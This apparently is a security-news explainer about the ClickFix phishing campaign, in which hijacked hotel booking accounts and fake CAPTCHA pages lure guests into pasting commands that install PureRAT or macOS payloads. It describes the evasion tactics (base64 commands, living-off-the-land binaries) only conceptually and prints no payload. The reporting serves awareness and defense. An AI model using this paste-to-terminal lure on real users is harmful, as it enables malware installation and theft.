Researchers in November 2025 disclosed a cross-platform phishing campaign known as ClickFix that exploits compromised travel-booking accounts and browser-based prompts to trick victims into executing code. Attackers first gain access to hotel Booking.com or other online travel-service accounts and contact people with pending reservations to create trust. Victims who follow a fake CAPTCHA-like prompt are asked to copy a short text string into a terminal or command window, a step that installs a Windows backdoor tracked as PureRAT or device-specific payloads for macOS. Security firms warn that many payloads use living-off-the-land techniques and browser sandbox copy/paste paths that make detection difficult, so user awareness is currently the clearest defense.
Key Takeaways
- Campaign vector: Attackers hijack hotel or travel-service accounts (e.g., Booking.com) to message customers with pending reservations, leveraging existing trust.
- Deception method: Victims are shown a fake CAPTCHA resembling Cloudflare and asked to paste a string into a terminal; that action triggers malware installation.
- Malware families: Windows infections have been tracked as PureRAT; other payloads target macOS when the landing page detects that OS.
- Evading detection: Many payloads are LOLBins—native OS binaries and scripts—and commands are often base64-encoded and executed via browser sandbox copy/paste.
- Security tooling limits: Endpoint protections such as Microsoft Defender may detect some activity but can be bypassed when no malicious file is written to disk and execution uses trusted binaries.
- User psychology: Recipients trust messages tied to confirmed reservations or top search results, making copy-paste prompts unusually persuasive.
- Seasonal risk: Family gatherings and travel in coming weeks raise the odds that less tech-savvy people will encounter ClickFix-style scams.
Background
Phishing has long relied on social trust, but recent campaigns have shifted from links and attachments to interactive instructions that request direct user action inside system consoles. Travel-booking services hold structured data—names, reservation codes, contact addresses—that attackers can weaponize to craft context-aware messages that look legitimate. Hotel staff or property managers often use shared booking accounts, and a compromised account can enable attackers to reach dozens or hundreds of guests who expect transactional communications.
At the same time, defenders face a technical handicap: modern operating systems include powerful, signed utilities and scripting engines intended for administrators. Attackers increasingly favor ‘living off the land’ techniques that repurpose these trusted tools, reducing reliance on easily flagged binaries. Browser sandboxes complicate visibility further; copy/paste actions inside a browser can handbase64-encoded commands to a native shell without producing an obvious file on disk, sidestepping many signature- and file-based detections.
Main Event
According to analysts at Sekoia and reporting by Push Security, campaigns begin with account compromise on a travel service used by hotels or hosts. With control of the account, attackers message guests with pending or recent reservations, referencing reservation details to establish legitimacy. The malicious landing page often mimics Cloudflare-style CAPTCHA flows and instructs the visitor to prove they are human by copying a short code into a system terminal or command window.
On Windows systems, that simple copy-and-paste step executes commands that fetch and run a backdoor tracked by researchers as PureRAT. On macOS and other platforms the same landing page adapts and delivers different payloads that may rely on native utilities. Push Security described the page as ‘adapting to the device that you’re visiting from,’ a design that increases success across user environments.
Many of the commands are base64-encoded to obscure intent and are executed through standard OS tools—so-called LOLBins—rather than by dropping a new executable to disk. Analysts observed that the payload sequence frequently runs from the browser sandbox context or via clipboard interactions, which limits telemetry and automated detection by many endpoint tools.
Analysis & Implications
Strategically, ClickFix separates trust-building from execution. By leveraging legitimate reservation metadata and channels, attackers bypass the initial skepticism most users have against email links or attachments. This social engineering inversion—where a site asks for a benign-looking terminal paste—preys on an assumption many people do not question: that copying short technical strings provided by a known service is safe.
Technically, living-off-the-land attacks stress defenses based on file signatures and static indicators. When signed system binaries perform the work and no malicious artifacts are written to disk, heuristic and behavioral detection become crucial. But those approaches generate more false positives and require richer telemetry, which not all organizations or consumer products provide by default.
The consumer impact is significant because travel-related messages are common and time-sensitive. Families planning trips or relatives coordinating stays during holiday periods may be particularly vulnerable. For businesses in hospitality and travel, the reputational harm from account compromises and fraudulent messages could lead to increased verification friction for legitimate customers.
Comparison & Data
| Stage | Technique | Detection difficulty |
|---|---|---|
| Initial contact | Compromised booking account messages | Medium (can mimic legitimate templates) |
| Execution trigger | Fake CAPTCHA and terminal paste | High (user-initiated, no file dropped) |
| Payload | LOLBins / base64 commands / PureRAT | High (native tools, in-memory execution) |
The table above shows why ClickFix-style campaigns are difficult to detect: the contact phase blends with routine communications, the execution requires explicit user action, and the payload uses native mechanisms to conceal activity. Organizations with richer behavioral analytics and telemetry covering clipboard and process tree events will detect more incidents; endpoint-only signature defenses are less reliable alone.
Reactions & Quotes
Security vendors and platform providers reacted by documenting tactics and urging both technical and user-focused countermeasures. Below are brief excerpts from public comments, each set in context of the reporting.
“adapting to the device that you’re visiting from”
Push Security (research note)
This wording describes how the same landing page serves different payloads based on OS fingerprinting, increasing cross-platform reach. Push Security’s analysis emphasized the adaptive payload delivery as a force multiplier for attackers.
“many payloads rely on living-off-the-land techniques”
Microsoft (security advisory)
Microsoft’s advisory framed LOLBins as a core evasive mechanism in these campaigns and highlighted the limitations of file-based scanning when native binaries perform malicious actions. The company recommended layered defenses, including behavior monitoring and telemetry collection.
Unconfirmed
- The full scale of infections tied specifically to ClickFix campaigns has not been publicly enumerated by vendors and remains unconfirmed.
- It is not always clear whether compromised travel accounts were accessed through credential theft, credential stuffing, or internal account takeover; attribution of initial access varies by incident.
- Precise bypass rates for Microsoft Defender and other endpoint products against these specific techniques have not been released and likely differ by configuration.
Bottom Line
ClickFix-style scams represent a meaningful evolution in phishing: they mix credible, context-aware outreach with execution techniques that exploit user trust and native system tools. Because the attack depends on a simple human action—copying and pasting a short string—the most effective immediate defense is informed, cautious behavior by users who receive unexpected instructions.
Technical defenses should adapt by improving behavioral detection, monitoring clipboard and process chain events where privacy and platform constraints permit, and hardening account security at travel platforms to reduce the number of compromised sender addresses. In the near term, families and frontline help-givers should treat any request to paste code into a terminal as suspicious and verify requests through separate channels before complying.
Sources
- Ars Technica — (technology journalism: reporting on security research)
- Sekoia — (security vendor / research firm)
- Push Security — (security research & incident analysis)
- Microsoft Security Blog — (vendor advisory / defensive guidance)